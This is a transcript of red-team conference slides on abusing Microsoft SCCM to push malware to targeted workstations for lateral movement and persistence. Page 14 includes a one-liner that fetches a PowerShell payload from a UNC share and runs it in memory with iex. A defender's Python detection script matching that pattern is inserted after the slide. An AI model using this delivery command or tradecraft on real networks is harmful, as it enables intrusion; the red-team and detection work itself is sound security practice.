Red Team Upgrades: Using SCCM for Malware Deployment

Upload: enigma0x3

Post on 21-Apr-2017

TRANSCRIPT

Page 1: Red team upgrades   using sccm for malware deployment

Red Team Upgrades: Using SCCM for Malware Deployment

Page 2

@enigma0x3

❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group

❖ Active developer on the PowerShell Empire project

❖ Offensive PowerShell advocate

❖ 2nd time speaking!

❖ This con is probably older than I am

❖ Indiana corn farmer turned h4x0r (not really)

Page 3

What this is...

❖ What is SCCM and how some admins fail at securing it

❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise.

➢ I’m going to cover targeted, strategic use as opposed to mass pwnage

Page 4

Setting the Stage

❖ This talk assumes you have RDP access to an SCCM server

❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not obtaining access to SCCM.

❖ No, having access to SCCM does not mean you own the enterprise

❖ If you administer SCCM as a domain admin, you fail.

Page 5

What is SCCM?

❖ Platform for distributing packages/applications to clients

❖ Packages, applications and install scripts are hosted on the SCCM server

❖ Set up and maintained via an agent/server architecture

❖ Consists of a central site server with distribution points.

➢ Agents check in to the server periodically to obtain new packages/applications

❖ Basically acts as internal RAT/C2

Page 6

SCCM in the enterprise

❖ 1 central site server with multiple distribution points

❖ Typically managed via controlled groups

➢ e.g. “SCCM Admins” in AD

❖ Typically setup/configured using a service account to run the application/push updates

❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share

❖ Admins gonna admin

Page 7

Page 8

Right Click Tools

❖ Add-On that can be installed to assist in client management tasks

❖ Should be installed on a client such as an administrative workstation...not on the server

➢ Admins install it on the server anyways

❖ Enables full control of managed endpoints

Page 9

Yep...

Page 10

Why use SCCM in Red Teaming?

❖ Manages a ton of distributed clients

➢ Take control of the server and you have distributed workstation control

➢ SCCM agents are just waiting to run your code

❖ Live off of the land

➢ Keep your malicious implant count low, use SCCM for very targeted implant distribution

➢ Looks like normal day-to-day traffic/activity

➢ To limit the risk of getting caught, become an admin and not a typical adversary

Page 11

Why use SCCM in Red Teaming? (cont)

❖ Allows you to identify and strategically group targets

➢ Able to push implants out in a very controlled and surgical manner

❖ Also acts as a persistence mechanism

Page 12

Abusing SCCM: Hunting

❖ Some organizations have user->device mapping

➢ This allows admins to create specific groups for departments

❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic

Page 13

Abusing SCCM: Compromise

❖ Create an application/package that utilizes PowerShell for payload delivery and execution

❖ Do so by creating a PowerShell payload and throwing it up on the public share SCCM uses (typically something like sccmsource)

Page 14

Abusing SCCM: Compromise

❖ Create a script installer application to fetch and execute your payload

➢ cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""

❖ Deploy the application to your target group and wait for the SCCM agents to check in

➢ Payload is fetched over UNC and runs in memory

❖ More here:

➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/
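From the defender's side, the script-installer pattern on this slide (SCCM client spawns cmd.exe/PowerShell, which reads a script from a UNC path and pipes it to iex) is visible in process-creation telemetry. The following is an added example, not code from the talk or from Microsoft: it runs simple indicator matching over constructed Sysmon-style process-creation events (field names, the server name sccm01, the share name and the file paths are all assumptions) and rates a hit higher when the parent is the SCCM client service, CcmExec.exe.

```python
import re

# Sysmon-style process-creation events; constructed for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "powershell.exe -c "gc \\sccm01\sccmsource\App\payload.txt | iex""'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "gc \\sccm01\sccmsource\App\payload.txt | iex"'},
    {"ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i \\sccm01\sccmsource\7zip\7z.msi /qn'},   # benign SCCM install
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "Get-Content C:\notes\todo.txt"'},     # benign user activity
]

# Indicator name -> case-insensitive regex applied to the command line.
INDICATORS = {
    "powershell": re.compile(r"\bpowershell(\.exe)?\b", re.I),
    "unc_source": re.compile(r"""\\\\[\w.-]+\\[^\s"']+""", re.I),        # \\server\share\...
    "reads_script": re.compile(r"\b(gc|cat|Get-Content)\b", re.I),       # script read from a file
    "in_memory_exec": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),  # piped into iex
}

def analyze_event(event):
    """Return (severity, matched indicator names) for one process-creation event."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    spawned_by_sccm = event.get("ParentImage", "").lower().endswith("ccmexec.exe")
    if spawned_by_sccm:
        hits.append("sccm_client_child")
    # Core pattern: PowerShell reading a script (from a UNC path) and piping it to iex.
    cradle = ("powershell" in hits and "in_memory_exec" in hits
              and ("unc_source" in hits or "reads_script" in hits))
    if not cradle:
        return "none", hits
    return ("high" if spawned_by_sccm else "medium"), hits

def scan(events):
    """Return only matching events as (index, severity, hits)."""
    return [(i, sev, hits) for i, (sev, hits) in enumerate(map(analyze_event, events))
            if sev != "none"]

if __name__ == "__main__":
    for idx, sev, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {sev} {hits}")
```

A benign SCCM-driven msiexec install and an interactive Get-Content both pass through; only the read-and-iex cradle is flagged, and it is rated high when CcmExec.exe is the parent.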

Page 15

Page 16

Questions and Contact

❖ Feel free to hit me up!

❖ enigma0x3 [at] gmail [dot] com

❖ @enigma0x3 on Twitter and Github

❖ enigma0x3 on Freenode: #psempire

❖ Blog: enigma0x3.wordpress.com